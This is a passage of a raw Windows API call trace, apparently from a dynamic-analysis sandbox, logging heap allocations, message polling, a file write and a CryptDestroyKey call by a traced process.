lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.462] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.462] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2f3c2f0 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0246.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2e893d8 [0246.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3c2f0 | out: hHeap=0x970000) returned 1 [0246.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0246.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2f3c2f0 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e893d8 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0246.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2e893d8 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3c2f0 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32238 | out: hHeap=0x970000) returned 1 [0246.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0246.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0246.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28180 | out: hHeap=0x970000) returned 1 [0246.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0246.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1e0c8 | out: hHeap=0x970000) returned 1 [0246.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2e7f320 [0246.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e893d8 | out: hHeap=0x970000) returned 1 [0246.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.520] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.520] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.520] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2f14010 [0246.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.522] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xa0b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xa0b0, lpOverlapped=0x0) returned 1 [0246.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0246.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0246.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0246.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0246.527] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0246.527] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.528] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0246.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0246.529] CryptDestroyKey (hKey=0xa87510) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0246.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0246.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0246.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.532] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: 